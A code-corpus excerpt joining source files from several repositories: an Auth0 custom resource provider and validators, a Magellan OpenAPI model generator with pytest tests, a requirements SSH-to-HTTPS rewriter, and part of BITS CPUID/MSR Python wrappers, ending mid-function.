PAGE_LIMIT = 60
class Auth0Provider():
"""
Generic Cloudformation custom resource provider for Auth0 resources.
"""
def __init__(self, management_secret, tenant):
"""Default constructor
Args:
management_secret (str): secrets manager location for the management api credentials
tenant (str): Auth0 tenant, e.g. mmm-dev
"""
self.secrets_manager = boto3.client('secretsmanager')
        admin = json.loads(secret.get_secret(
            self.secrets_manager, management_secret))
self.authenticate(
tenant,
admin['AUTH0_CLIENT_ID'],
admin['AUTH0_CLIENT_SECRET']
)
def authenticate(self, tenant, client_id, client_secret):
"""Sets up an authenticated client
Args:
tenant (str): tenant name for auth0
client_id (str): id of the application authorized to use the management api
client_secret (str): client secret for the above application
"""
get_token = GetToken(tenant)
logger.info('Getting token for tenant %s with client %s', tenant, client_id)
token = get_token.client_credentials(
client_id, client_secret, 'https://{}/api/v2/'.format(tenant))
mgmt_api_token = token['access_token']
self.auth0 = Auth0(tenant, mgmt_api_token)
return self.auth0
def create_application(self, **kwargs):
"""Create an Auth0 Application (Client)
Args:
name (str): Name of the application, e.g. myapp
app_type (str): Type of application - spa, m2m, native, or web
"""
client = self.auth0.clients.create(kwargs)
return client['client_id'], client['client_secret']
def create_api(self, **kwargs):
"""Create an Auth0 API (Resource)
Args:
name (str): Name of the api, e.g. myapi
audience (str): Audience url, must include http:// or https://
"""
server = self.auth0.resource_servers.create(kwargs)
return server['id']
def create_grant(self, audience, application_id):
"""Create an Auth0 grant (client_grant)
Args:
audience (str): Audience url, must include http:// or https://
application_id (str): ID of the application
"""
grant = self.auth0.client_grants.create(
{'client_id': application_id, 'audience': audience, 'scope': []})
return grant['id']
def create_resource(self, url, name):
"""Create an auth0 resource
Creates a client (application), resource server (api), and a grant for the client to use
the resource server.
Args:
url (str): Url for the API, e.g. appsync url
name (str): Name for the client and resource server
"""
client = self.auth0.clients.create(
{'name': name, 'app_type': 'non_interactive'})
server = self.auth0.resource_servers.create(
{'name': name, 'identifier': url})
grant_id = self.auth0.client_grants.create(
{'client_id': client['client_id'], 'audience': url, 'scope': []})
return client['client_id'], client['client_secret'], server['id'], grant_id['id']
def rotate_client_secret(self, client_id):
"""Rotate a client secret
Args:
client_id (str): ID of the client to rotate the secret for
"""
resp = self.auth0.clients.rotate_secret(client_id)
return resp['client_secret']
def update_resource(self):
"""Update a resource"""
# Nothing to update at the moment
    def update_api(self, api_id, **kwargs):
        """Update an api
        Args:
            api_id (str): ID of the resource server (API) to update
            **kwargs (dict): configuration of the resource server
        """
        self.auth0.resource_servers.update(api_id, kwargs)
def get_resource_server(self, url):
"""Gets the id of a resource server based on the audience
Args:
url (str): Url associated with the resource server
"""
page = 0
prev = []
while page is not None:
resource_list = self.auth0.resource_servers.get_all(
page=page, per_page=50)
# If there is only one page, get_all will return the same
# value for every page
if prev == resource_list:
break
prev = resource_list
if resource_list == []:
break
for resource in resource_list:
if resource['identifier'] == url:
return resource['id']
page += 1
if page > PAGE_LIMIT:
break
time.sleep(1)
return None
def get_application(self, client_id, fields=None, include_fields=True):
"""Get an application (client) from auth0 by id"""
return self.auth0.clients.get(id=client_id, fields=fields, include_fields=include_fields)
def add_to_connection(self, conn_id, app_id):
"""Enable a connection for an application"""
connection = self.auth0.connections.get(conn_id, ['enabled_clients'])
# add the app_id to the list of enabled_clients
if app_id not in connection['enabled_clients']:
connection['enabled_clients'].append(app_id)
# update the connection
self.auth0.connections.update(conn_id, {'enabled_clients': connection['enabled_clients']})
def remove_from_connection(self, conn_id, app_id):
"""Disable a connection for an application"""
connection = self.auth0.connections.get(conn_id, ['enabled_clients'])
        # remove the app_id from the list of enabled_clients
if app_id in connection['enabled_clients']:
connection['enabled_clients'].remove(app_id)
# update the connection
self.auth0.connections.update(conn_id, {'enabled_clients': connection['enabled_clients']})
def update_application(self, client_id, **kwargs):
"""Update an Auth0 Application (Client)
Args:
client_id (str): ID of the Auth0 Application (client)
**kwargs (dict): configuration of the auth0 client
"""
client = self.auth0.clients.update(client_id, kwargs)
return client['client_id']
def delete_application(self, app_id):
"""Delete an application
Args:
app_id (str): The ID of the application to delete
"""
return self.auth0.clients.delete(app_id)
def delete_grant(self, grant_id):
"""Delete a grant
Args:
grant_id (str): The ID of the grant to delete
"""
return self.auth0.client_grants.delete(grant_id)
def delete_api(self, api_id):
"""Delete an api
Args:
api_id (str): The ID of the api to delete
"""
return self.auth0.resource_servers.delete(api_id)
def delete_resource(self, resource_id, client_id):
"""Delete a resource
Deletes the resource server, client, and client grant in the resource
Args:
resource_id (str): The ID of the resource_server to delete
client_id (str): The ID of the client to delete
"""
self.auth0.clients.delete(client_id)
# Deleting a client also deletes the grants associated with it
self.auth0.resource_servers.delete(resource_id)
```
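A hypothetical usage sketch for the provider above. The secret name is a placeholder; per the constructor, the secret must hold `AUTH0_CLIENT_ID` and `AUTH0_CLIENT_SECRET` for an application authorized to use the management API:

```python
# Hypothetical usage sketch; "auth0/management" is a placeholder secret name.
from src.auth0_provider.index import Auth0Provider

provider = Auth0Provider("auth0/management", "mmm-dev.auth0.com")
client_id, client_secret = provider.create_application(
    name="myapp", app_type="non_interactive")
api_id = provider.create_api(name="myapi",
                             identifier="https://api.example.com")
grant_id = provider.create_grant("https://api.example.com", client_id)
```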
#### File: aws-auth0-custom-resource/src/grant.py
```python
import logging
import boto3
from crhelper import CfnResource
from auth0.v3.exceptions import Auth0Error
from .utils import config
from .lambdatype import LambdaDict, LambdaContext
from .validation.grant import auth0Validator
logger = logging.getLogger('aws-auth0-cr')
secrets_client = boto3.client('secretsmanager')
def create(event: LambdaDict, _: LambdaContext, helper: CfnResource) -> str:
"""
Create a client grant with the given name and audience
"""
props = event['ResourceProperties']
validated = auth0Validator.validated(props)
if not validated:
raise Exception(auth0Validator.errors)
provider = config.get_provider(props.get('Tenant'))
grant_id = provider.create_grant(**validated)
helper.Data['GrantId'] = grant_id
return grant_id
def update(event, context, helper): # pylint: disable=unused-argument
"""
update a client grant
    Grants have no mutable properties, so nothing is updated in place. An
    update event typically means the user changed a logical ID or a reference
    for the grant; in that case we re-run create, assuming the original
    API or Application was replaced.
"""
try:
grant_id = create(event, context, helper)
except Auth0Error as err:
logger.error(err)
if err.status_code != 409:
raise err
grant_id = event['PhysicalResourceId']
helper.Data['GrantId'] = grant_id
return grant_id
def delete(event, context, helper): # pylint: disable=unused-argument
"""delete a client grant"""
logger.info(event)
props = event['ResourceProperties']
provider = config.get_provider(props.get('Tenant'))
try:
# deleting a grant id that doesn't exist does not raise exception
# see e2e/test_errors.py
provider.delete_grant(event['PhysicalResourceId'])
except Auth0Error as err:
logger.error(err)
if 'Path validation error' in err.message:
            logger.error('physical resource id is not a valid grant. '
                         'Assuming this failed to create.')
return
raise
```
#### File: src/utils/secret.py
```python
import base64
import logging
from botocore.exceptions import ClientError
logger = logging.getLogger('aws-auth0-cr')
def get_muxed_secret(client, secret_id, stage='AWSCURRENT'):
"""
Get a secret from secrets manager with the value
decoded to SecretValue
"""
try:
get_secret_value_response = client.get_secret_value(
SecretId=secret_id,
VersionStage=stage
)
# Decrypts secret using the associated KMS CMK.
# Depending on whether the secret is a string or binary,
# one of these fields will be populated.
if 'SecretString' in get_secret_value_response:
secret = get_secret_value_response['SecretString']
else:
secret = base64.b64decode(
get_secret_value_response['SecretBinary'])
        # normalized secret
get_secret_value_response['SecretValue'] = secret
return get_secret_value_response
except ClientError as err:
if err.response['Error']['Code'] == 'DecryptionFailureException':
logger.error('Unable to decrypt secret: %s', err.response)
raise err
if err.response['Error']['Code'] == 'InternalServiceErrorException':
logger.error(
'Internal server error in secrets manager %s', err.response)
raise err
if err.response['Error']['Code'] == 'InvalidParameterException':
logger.error('Invalid parameter error: %s', err.response)
raise err
if err.response['Error']['Code'] == 'InvalidRequestException':
logger.error(
'Invalid request for state of secret error: %s', err.response)
raise err
if err.response['Error']['Code'] == 'ResourceNotFoundException':
logger.error('Resource not found error %s', err.response)
raise err
logger.error('Error with secretsmanager API call: %s', err.response)
raise err
def get_secret(client, secret_id, stage='AWSCURRENT'):
"""Get a secret value from secrets manager"""
resource = get_muxed_secret(client, secret_id, stage)
return resource['SecretValue']
```
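A minimal sketch of calling the helper above; the secret id is a placeholder and the secret is assumed to contain a JSON string:

```python
# Minimal sketch; "my-app/credentials" is a placeholder secret id.
import json
import boto3
from src.utils.secret import get_secret

client = boto3.client("secretsmanager")
creds = json.loads(get_secret(client, "my-app/credentials"))
```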
#### File: src/validation/application.py
```python
import json
from cerberus import Validator
from . import AuthnValidator, to_bool
APP_TYPE_MAP = {
'spa': 'spa',
'native': 'native',
'm2m': 'non_interactive',
'web': 'regular_web',
}
AUTH_METHOD_MAP = {
'None': 'none',
'Post': 'client_secret_post',
'Basic': 'client_secret_basic'
}
def to_auth_method_type(val):
"""coerce the auth method to the api value"""
    if val not in AUTH_METHOD_MAP:
raise ValueError(
f'method should be one of {",".join(AUTH_METHOD_MAP.keys())}'
)
return AUTH_METHOD_MAP[val]
def to_app_type(val):
"""coerce the app type value"""
if val not in APP_TYPE_MAP:
raise ValueError(
'type should be one of {}'.format(','.join(APP_TYPE_MAP.keys()))
)
return APP_TYPE_MAP[val]
# pylint: disable=invalid-name
auth0 = {
'tenant': {
'type': 'string',
'readonly': True,
'empty': False,
},
'service_token': {
'type': 'string',
'readonly': True,
'empty': False,
},
'name': {
'type': 'string',
'required': True,
'empty': False,
},
'description': {
'type': 'string',
'required': True,
'empty': False,
},
'logo_uri': {'type': 'string'},
'type': {
'rename': 'app_type',
'required': True,
'type': 'string',
'allowed': ['spa', 'native', 'non_interactive', 'regular_web'],
'coerce': (to_app_type),
},
'token_endpoint_auth_method': {
'type': 'string',
        # cerberus checks 'allowed' after coercion, so list the coerced API
        # values here (mirroring how 'type' lists the coerced app types above)
        'allowed': ['none', 'client_secret_post', 'client_secret_basic'],
# 'default': 'None',
'coerce': (to_auth_method_type),
},
'auth_method': {
'rename': 'token_endpoint_auth_method',
'type': 'string',
},
'login_u_r_i': {
'rename': 'initiate_login_uri',
'type': 'string',
},
'callback_urls': {
'rename': 'callbacks',
'type': 'list',
'schema': {'type': 'string'},
},
'logout_urls': {
'rename': 'allowed_logout_urls',
'type': 'list',
'schema': {'type': 'string'}
},
'web_origins': {
'type': 'list',
'schema': {'type': 'string'}
},
'allowed_origins': {
'type': 'list',
'schema': {'type': 'string'}
},
'j_w_t_configuration': {
'rename': 'jwt_configuration',
'schema': {
'lifetime_in_seconds': {'type': 'integer', 'default': 3600, 'coerce': int},
'scopes': {'type': 'dict'},
'alg': {'type': 'string'},
}
},
# SPA/Web/Native only
'refresh_token': {
'type': 'dict',
'dependencies': 'grant_types',
'schema': {
'rotation_type': {
'type': 'string',
'allowed': ['rotating', 'non-rotating'],
},
'expiration_type': {
'type': 'string',
'allowed': ['expiring', 'non-expiring'],
},
'token_lifetime': {
'type': 'integer',
'min': 1800,
'max': 2592000,
'coerce': int
},
}
},
# # Native
'native_social_login': {
'type': 'dict',
'dependencies': {'type': ['native']},
'schema': {
'apple': {
'type': 'dict',
},
'facebook': {
'type': 'dict',
},
}
},
# # Advanced : Danger Zone
'client_metadata': {
'type': 'dict',
'default': {},
},
'mobile': {
'type': 'dict',
'schema': {
'android': {
'type': 'dict',
'schema': {
'app_package_name': {
'type': 'string'
},
'sha256_cert_fingerprints': {
'type': 'list'
},
}
},
'ios': {
'type': 'dict',
'schema': {
'team_id': {
'type': 'string'
},
'app_bundle_identifier': {
'type': 'string'
},
},
}
},
},
'allowed_clients': {
'type': 'list'
},
'oidc_conformant': {
'type': 'boolean',
'coerce': to_bool
},
# 'cross_origin_loc': '', # Cross-Origin Verification Fallback
# M2M Only
'grant_types': {
'type': 'list',
'anyof': [
{
'dependencies': {'type': 'non_interactive'},
'allowed': [
'client_credentials',
'implicit',
'authorization_code',
'refresh_token',
'password',
'mfa',
],
},
{
'dependencies': {'type': ['spa', 'native', 'regular_web']},
'allowed': [
'implicit',
'authorization_code',
'refresh_token',
'password',
'mfa',
],
},
],
},
'allow_ad_groups': {
'readonly': True,
'type': 'list',
'dependencies': {'type': ['spa', 'native', 'regular_web']},
'schema': {
'type': 'string',
}
},
# custom-resource specific
'connections': {
'readonly': True,
'type': 'list',
'schema': {
'type': 'string'
}
}
}
tags_schema = {
'ApplicationID': {
'type': 'string',
},
'AllowAdGroups': {
'type': 'string',
'coerce': (lambda x: json.dumps(x, separators=(',', ':'))),
'maxlength': 255,
}
}
application_defaults = {
'non_interactive': {
'grant_types': ['client_credentials'],
'token_endpoint_auth_method': 'client_secret_post',
},
'spa': {
'grant_types': ['implicit', 'authorization_code', 'refresh_token'],
'token_endpoint_auth_method': 'none',
}
}
def with_defaults(document):
"""a function to return defaults on an application type"""
app_type = document['app_type']
if app_type not in application_defaults:
return {}
return application_defaults[app_type]
auth0Validator = AuthnValidator(
auth0,
with_defaults=with_defaults,
)
tagsValidator = Validator(
tags_schema,
purge_unknown=True,
)
``` |
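A sketch of the normalization the schema above performs. `AuthnValidator` is defined elsewhere in the package, so treat the exact output as illustrative only; the renaming and coercion follow from the schema entries:

```python
# Illustrative only: shows the rename/coerce behavior of the schema above.
props = {
    "name": "myapp",
    "description": "demo app",
    "type": "m2m",                        # coerced to app_type='non_interactive'
    "token_endpoint_auth_method": "Post"  # coerced to 'client_secret_post'
}
validated = auth0Validator.validated(props)
# Expected shape (plus schema defaults such as client_metadata={}):
# {'name': 'myapp', 'description': 'demo app',
#  'app_type': 'non_interactive',
#  'token_endpoint_auth_method': 'client_secret_post', ...}
```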
{
"source": "3mcloud/magellan-models",
"score": 3
} |
#### File: magellan_models/interface/constant_magellan_response.py
```python
from __future__ import annotations
from typing import TYPE_CHECKING
from magellan_models.interface.magellan_response import MagellanResponse
from magellan_models.config import MagellanConfig
from magellan_models.exceptions import MagellanRuntimeException
if TYPE_CHECKING:
from magellan_models.interface.abstract_api_model import AbstractApiModel
class ConstantMagellanResponse(MagellanResponse):
"""This is the immutable MagellanResponse returned by `query` calls"""
def __init__( # pylint: disable=too-many-arguments
self,
url_path: str,
raw_params: dict,
Model: AbstractApiModel,
config: MagellanConfig,
limit: int = None,
**kwargs
) -> ConstantMagellanResponse:
"""Generates a new ConstantMagellanResponse
Args:
url_path (str): The base path to start with (See MagellanResponse)
raw_params (dict): The raw params passed to `query`
Model (AbstractApiModel): A MagellanModel
config (MagellanConfig): A MagellanConfig associated with the model
limit (int, optional): The limit for the number of responses. Defaults to None.
Returns:
ConstantMagellanResponse: [description]
"""
self.raw_params = raw_params
super().__init__(url_path, Model, config, limit, **kwargs)
def process_next_page_of_results(self):
"""Processes the next page of results using the internal parameters"""
if self.next_url is None or self.iteration_is_complete():
# Done iterating, next_url is None when we have no more results to get
return
header_and_args = self.__config__.create_header(**self.kwargs)
header = header_and_args[0]
if len(self) == 0: # first call
route = self.next_url
resp = self.get_request(route, self.raw_params, header)
self.iterate_through_response(resp)
else:
resp = self.get_request(url=self.next_url, headers=header)
self.iterate_through_response(resp)
self.next_url = self.__config__.get_next_link_from_resp(resp)
self.__meta_data__ = self.__config__.get_meta_data_from_resp(resp)
return
def where(self, **kwargs):
raise MagellanRuntimeException("You can't chain on a ConstantMagellanResponse")
    def __getattr__(self, name):
        raise AttributeError(name)
def limit(self, new_limit):
raise MagellanRuntimeException(
"You can't set a new limit on a ConstantMagellanResponse"
)
```
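For illustration, a sketch of constructing one of these directly. In practice a `ConstantMagellanResponse` is returned by a generated model's `query` call; `Faction` here stands in for any generated Magellan model, and the endpoint is a placeholder:

```python
# Illustrative only: normally returned by a generated Model's `query` call.
resp = ConstantMagellanResponse(
    url_path="https://api.example.com/factions",  # placeholder endpoint
    raw_params={"filter[title]": "Fake"},
    Model=Faction,             # a generated Magellan model (assumed in scope)
    config=Faction.configuration(),
    limit=25,
)
for faction in resp:           # pages are fetched lazily as iteration proceeds
    print(faction)
```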
#### File: magellan_models/model_generator/generate_from_spec.py
```python
from typing import Tuple
import inflection
from magellan_models.config import MagellanConfig
from .openapi_parser import (
get_resource_mapping,
parse_resource_names_and_other_routes_from_mapping,
)
from .model_parser import get_model_representation
from .generate_dynamic_model import generate_model
from .generate_nonrest_functions import generate_func_for_route
from .generic_functions_generator import get_generic_function
def generate_from_spec(
spec: dict, configuration: MagellanConfig
) -> Tuple[dict, dict, MagellanConfig]:
"""Generates Models from an OpenAPI specification json body
These models are defined via the template file under templates
and inherit from the abstractApiModel class
upon generation, models can be imported via src.models.endpoint_models
Arguments:
spec {Dict} -- Dict representation of the open api specification json
configuration {MagellanConfig} -- Configuration instance containing user settings
Output:
tuple(dict, dict, MagellanConfig)
First dict: str => AbstractApiModel mapping of class names to Models
Second dict: str => function, a mapping of non-Model functions that are accessible.
MagellanConfig: configuration instance linked to all Models and Functions generated
"""
resource_mapping = get_resource_mapping(spec)
resource_names, other_routes = parse_resource_names_and_other_routes_from_mapping(
resource_mapping, configuration.id_separator
)
model_representations = []
model_names = []
for resource_name in resource_names:
model_names.append(inflection.camelize(inflection.singularize(resource_name)))
model_representations.append(
get_model_representation(spec, resource_name, configuration)
)
model_definitions = {}
for repres in model_representations:
model_definitions[repres["class_name"]] = generate_model(
repres, model_names, model_definitions, configuration
)
functional_routes = {}
for route in other_routes:
func_name, function = generate_func_for_route(route, configuration)
functional_routes[func_name] = function
functional_routes["_generic_api_function"] = get_generic_function(configuration)
if configuration.print_on_init:
print("Completed Model and Function Generation")
print("The following Models were generated:")
for key in model_definitions:
print(key)
print("The following Functions were generated:")
for key in functional_routes:
print(key)
print(
"You can access https://github.mmm.com/MMM/magellan/tree/master/docs for the latest Documentation" # pylint: disable=line-too-long
)
return (model_definitions, functional_routes, configuration)
```
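A rough wiring sketch for the generator above. It assumes `spec` is an already-parsed OpenAPI dict and that `MagellanConfig` can be constructed with defaults; the endpoint is a placeholder:

```python
# Rough wiring sketch; `spec` is an already-parsed OpenAPI dict.
from magellan_models.config import MagellanConfig
from magellan_models.model_generator.generate_from_spec import generate_from_spec

config = MagellanConfig()
config.api_endpoint = "https://api.example.com"  # placeholder endpoint
models, funcs, config = generate_from_spec(spec, config)
Faction = models["Faction"]  # model names are camelized singular resource names
```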
#### File: tests/initializer_tests/test_init_with_endpoint.py
```python
import pytest
from magellan_models import initialize_with_endpoint
from tests.helper import get_testing_spec
def test_init_with_endpoint_works(requests_mock):
example_path = "https://localhost/api/v1/swagger.yaml"
requests_mock.get(example_path, status_code=200,
json=get_testing_spec())
models, funcs, conf = initialize_with_endpoint(example_path)
assert models is not None
assert funcs is not None
assert conf is not None
assert requests_mock.called
def test_init_with_endpoint_throws_on_error(requests_mock):
example_path = "https://localhost/api/v1/swagger.yaml"
requests_mock.get(example_path, status_code=9000,
json=get_testing_spec())
with pytest.raises(Exception):
initialize_with_endpoint(example_path)
assert requests_mock.called
```
#### File: tests/interface_tests/test_constant_magellan_response.py
```python
from magellan_models.interface import ConstantMagellanResponse
from magellan_models.exceptions import MagellanRuntimeException
import pytest
def test_const_mag_resp_gets_further_pages_to_hit_limit(
requests_mock, generated_models
):
Faction = generated_models.get("Faction")
config = Faction.configuration()
route = f"{config.api_endpoint}/{Faction.resource_name()}"
generated_params = "?"
payload_entities = []
for i in range(20):
payload_entities.append(
{
"attributes": {
"id": i + 1,
"title": f"Fake Data {i}",
"description": "Fake Data element",
"tags": ["Fake", "Data"],
}
}
)
first_page = {
"data": payload_entities[0:10],
"meta": {"entity_count": 20},
"links": {"next": route + generated_params + "page2"},
}
second_page = {"data": payload_entities[10:19], "meta": {"entity_count": 20}}
requests_mock.get(route + generated_params, status_code=200, json=first_page)
requests_mock.get(
route + generated_params + "page2", status_code=200, json=second_page
)
mag_resp = ConstantMagellanResponse(
url_path=route, Model=Faction, config=config, limit=15, raw_params={}
)
assert requests_mock.called
assert requests_mock.call_count == 1 # Shouldn't hit second page until needed
assert len(mag_resp) == 10
count = 0
for elem in mag_resp:
count += 1
assert requests_mock.call_count == 2
assert len(mag_resp) == 15
def test_const_mag_resp_exceptions_on_where_and_limit(requests_mock, generated_models):
Faction = generated_models.get("Faction")
config = Faction.configuration()
route = f"{config.api_endpoint}/{Faction.resource_name()}"
generated_params = "?"
payload_entities = []
for i in range(20):
payload_entities.append(
{
"attributes": {
"id": i + 1,
"title": f"Fake Data {i}",
"description": "Fake Data element",
"tags": ["Fake", "Data"],
}
}
)
first_page = {
"data": payload_entities[0:10],
"meta": {"entity_count": 20},
"links": {"next": route + generated_params + "page2"},
}
requests_mock.get(route + generated_params, status_code=200, json=first_page)
mag_resp = ConstantMagellanResponse(
url_path=route, Model=Faction, config=config, limit=9, raw_params={}
)
assert requests_mock.called
assert requests_mock.call_count == 1 # Shouldn't hit second page until needed
assert len(mag_resp) == 9
with pytest.raises(MagellanRuntimeException):
mag_resp.where(id=12)
with pytest.raises(MagellanRuntimeException):
mag_resp.limit(5)
def test_const_mag_resp_returns_when_next_page_is_none(requests_mock, generated_models):
Faction = generated_models.get("Faction")
config = Faction.configuration()
route = f"{config.api_endpoint}/{Faction.resource_name()}"
generated_params = "?"
payload_entities = []
for i in range(20):
payload_entities.append(
{
"attributes": {
"id": i + 1,
"title": f"Fake Data {i}",
"description": "Fake Data element",
"tags": ["Fake", "Data"],
}
}
)
first_page = {"data": payload_entities[0:10], "meta": {"entity_count": 20}}
requests_mock.get(route + generated_params, status_code=200, json=first_page)
mag_resp = ConstantMagellanResponse(
url_path=route, Model=Faction, config=config, limit=9, raw_params={}
)
assert requests_mock.called
assert requests_mock.call_count == 1 # Shouldn't hit second page until needed
assert mag_resp.next_url is None
assert mag_resp.process_next_page_of_results() is None
``` |
{
"source": "3mcloud/requirement-walker",
"score": 3
} |
#### File: requirement-walker/examples/sst_to_https.py
```python
import re
import logging
import subprocess
from functools import lru_cache
from shutil import which
# 3rd Party
from requirement_walker import walk
# Owned
# Used to pull out the ssh domain to see if we have access to it.
EXTRACT_SSH_DOMAIN = re.compile(r"(?<=ssh://)(.*?)(?=/)")
# Used to pull out the leading ssh part so we can swap it with https.
MATCH_SSH = re.compile(r'ssh://git@')
LOGGER = logging.getLogger(__name__)
@lru_cache(maxsize=32)
def has_ssh(ssh_domain: str) -> bool:
"""
Check that the user has ssh access to the given ssh domain
First it will verify if ssh is installed in $PATH
then check if we can authenticate to ssh_domain
over ssh. Returns False if either of these are untrue
Example ssh_domain: [email protected]
"""
result = None
if which('ssh') is not None:
result = subprocess.Popen(['ssh', '-Tq', ssh_domain, '2>', '/dev/null'])
result.communicate()
if not result or result.returncode == 255:
return False
return True
def ssh_check_or_https(input_file_path: str, output_file_path: str) -> None:
"""
Given a path to q requirements file, will look for SSH requirements. If this terminal
does not have access to that SSH domain then it will change the requirement to HTTPs.
Can handle referencing other requirement files BUT will output all requirements to a SINGLE
requirement file.
ARGS:
input_file_path (str): Path to the inputted requirements.txt file.
output_file_path (str): Path to output all the requirements to.
All requirements will be outputted
"""
entries = []
for entry in walk(input_file_path):
if entry.requirement.url:
ssh_domain = EXTRACT_SSH_DOMAIN.search(entry.requirement.url)
if ssh_domain and not has_ssh(ssh_domain.group(1)):
new_url = MATCH_SSH.sub('https://', entry.requirement.url)
LOGGER.info(
"No access to domain %s:\n"
" Swapping:\n"
" - %s\n"
" For:\n"
" - %s\n", ssh_domain.group(1), entry.requirement.url, new_url)
entry.requirement.url = new_url
entries.append(entry)
with open(output_file_path, 'w') as req_file:
req_file.writelines((str(entry) + '\n' for entry in entries))
``` |
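Usage is straightforward; the paths below are placeholders:

```python
# Rewrites unreachable ssh:// requirements to https:// in one pass.
import logging

logging.basicConfig(level=logging.INFO)
ssh_check_or_https("requirements.txt", "requirements.resolved.txt")
```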
{
"source": "3mdeb/bits",
"score": 2
} |
#### File: python/bits/platformbase.py
```python
from __future__ import print_function
import bits
import functools
import inspect
import operator
import textwrap
_wrapper = textwrap.TextWrapper(width=78, initial_indent=' ', subsequent_indent=' ')
class CPUID(object):
# Subclasses must define a "leaf" field as part of the class definition.
def __init__(self, regs):
self.regs = regs
@classmethod
def read(cls, apicid, subleaf=0):
r = cls(bits.cpuid(apicid, cls.leaf, subleaf))
r.apicid = apicid
r.subleaf = subleaf
return r
# FIXME: This allows getting subleaves, but requires having an instance of
# the class first, which means always reading subleaf 0 and then the
# desired subleaf.
def __getitem__(self, subleaf):
return self.read(self.apicid, subleaf)
def __eq__(self, other):
return self.regs == other.regs
def __ne__(self, other):
return self.regs != other.regs
def __str__(self):
T = type(self)
fields = dict((regnum, {}) for regnum in range(len(self.regs._fields)))
properties = list()
for field_name in dir(T):
field = getattr(T, field_name)
if isinstance(field, cpuidfield):
fields[field.reg][field_name] = field
elif isinstance(field, property):
properties.append(field_name)
heading = "APIC ID {:#x} -- ".format(self.apicid)
heading += "CPUID (EAX={:#x}".format(self.leaf)
if self.subleaf:
heading += ", ECX={:#x}".format(self.subleaf)
heading += ")"
s = heading + "\n" + "-"*len(heading) + "\n"
doc = inspect.getdoc(self)
if doc:
s += doc + "\n"
def format_range(msb, lsb):
if msb == lsb:
return "[{}]".format(msb)
return "[{}:{}]".format(msb, lsb)
def format_field(msb, lsb, value):
"""Field formatter that special-cases single bits and drops the 0x"""
if msb == lsb:
return str(value)
return "{:#x}".format(value)
for regnum, regname in enumerate(self.regs._fields):
s += "\n"
s1 = " {}={:#010x} ".format(regname, self.regs[regnum])
s += s1
inner = ("\n " + " " * len(s1)).join(
"{}{} {}={}".format(regname, format_range(field.msb, field.lsb), field_name, format_field(field.msb, field.lsb, getattr(self, field_name)))
for field_name, field in sorted(fields[regnum].iteritems(), key=(lambda (k, v): v.lsb))
)
if inner:
s += " {}".format(inner)
properties = sorted(set(properties))
if len(properties):
s += "\n Attributes derived from one or more fields:"
for property_name in properties:
s += '\n'
temp = "{}={}".format(property_name, getattr(self, property_name))
s += '\n'.join(_wrapper.wrap(temp))
return s
class cpuidfield(property):
def __init__(self, reg, msb, lsb, doc="Bogus"):
self.reg = reg
self.msb = msb
self.lsb = lsb
max_value = (1 << (msb - lsb + 1)) - 1
field_mask = max_value << lsb
def getter(self):
return (self.regs[reg] & field_mask) >> lsb
super(cpuidfield, self).__init__(getter, doc=doc)
def make_CPUIDS(classes):
class CPUIDS(object):
leafs = dict()
def __init__(self, apicid):
self.apicid = apicid
def __getitem__(self, leaf_in):
l = self.leafs.get(leaf_in)
if l is not None:
return getattr(self, l)
class DYNAMIC_LEAF_(CPUID):
__doc__ = "Dynamic CPUID leaf {:#X}".format(leaf_in)
leaf = leaf_in
DYNAMIC_LEAF_.__name__ += "{:X}".format(leaf_in)
return DYNAMIC_LEAF_.read(self.apicid)
def __iter__(self):
for leaf_num in sorted(self.leafs.keys()):
yield self[leaf_num]
for c in classes:
assert CPUIDS.leafs.get(c.leaf) is None, "Internal error: Duplicate CPUID leaf {:#X}".format(c.leaf)
def getter(inner_c, self):
return inner_c.read(self.apicid)
setattr(CPUIDS, c.__name__, property(functools.partial(getter, c), None))
CPUIDS.leafs[c.leaf] = c.__name__
return CPUIDS
class MSR(object):
# Subclasses must define a "addr" field as part of the class definition.
def __init__(self, value=0):
self.value = value
def __eq__(self, other):
return self.value == other.value
def __ne__(self, other):
return self.value != other.value
@classmethod
def rdmsr(cls, apicid):
r = cls(bits.rdmsr(apicid, cls.addr))
r.apicid = apicid
return r
def wrmsr(self, apicid=None):
if apicid is None:
apicid = self.apicid
bits.wrmsr(apicid, self.addr, self.value)
def __str__(self):
T = type(self)
fields = {}
properties = []
for field_name in dir(T):
field = getattr(T, field_name)
if isinstance(field, msrfield):
fields[field_name] = field
elif isinstance(field, property):
properties.append(field_name)
heading = "APIC ID {:#x} -- ".format(self.apicid)
heading += "MSR {:#x}".format(self.addr)
s = heading + "\n" + "-"*len(heading) + "\n"
doc = inspect.getdoc(self)
if doc:
s += doc + "\n\n"
s += "MSR {:#x}".format(self.addr)
if self.value is None:
s += ' value=GPF'
return s
s += ' value={:#x}'.format(self.value)
for field_name, field in sorted(fields.iteritems(), key=(lambda (k, v): v.lsb)):
s += '\n'
temp = "[{}:{}] {}={:#x}".format(field.msb, field.lsb, field_name, getattr(self, field_name))
# FIXME: check wrapper, and use a hanging indent to wrap the docstring to len(temp)+1
if field.__doc__:
temp += " " + inspect.getdoc(field)
s += '\n'.join(_wrapper.wrap(temp))
if properties:
s += "\n Attributes derived from one or more fields:"
for property_name in sorted(properties):
s += '\n'
temp = "{}={}".format(property_name, getattr(self, property_name))
# FIXME: check wrapper, get the property documentation string if any, and use a hanging indent to wrap the docstring to len(temp)+1
s += '\n'.join(_wrapper.wrap(temp))
return s
class msrfield(property):
def __init__(self, msb, lsb, doc=None):
self.msb = msb
self.lsb = lsb
max_value = (1 << (msb - lsb + 1)) - 1
field_mask = max_value << lsb
def getter(self):
return (self.value & field_mask) >> lsb
def setter(self, value):
if value > max_value:
if msb == lsb:
field = "[{0}]".format(msb)
else:
field = "[{0}:{1}]".format(msb, lsb)
raise OverflowError("Value {value:#x} too big for MSR {self.addr:#x} field {field}".format(**locals()))
self.value = (self.value & ~field_mask) | (value << lsb)
super(msrfield, self).__init__(getter, setter, doc=doc)
def make_MSRS(classes):
class MSRS(object):
addrs = dict()
def __init__(self, apicid):
self.apicid = apicid
def __getitem__(self, addr_in):
addr = self.addrs.get(addr_in)
if addr is not None:
return getattr(self, addr)
class DYNAMIC_MSR_(MSR):
__doc__ = "Dynamic MSR addr {:#x}".format(addr_in)
addr = addr_in
DYNAMIC_MSR_.__name__ += "{:x}".format(addr_in)
return DYNAMIC_MSR_.rdmsr(self.apicid)
def __iter__(self):
for addr in sorted(self.addrs.keys()):
yield self[addr]
for c in classes:
if not hasattr(c, "addr"):
print("Internal error: MSR addr missing {}".format(c.__name__))
assert MSRS.addrs.get(c.addr) is None, "Internal error: Duplicate MSR addr {:#x}".format(c.addr)
def getter(inner_c, self):
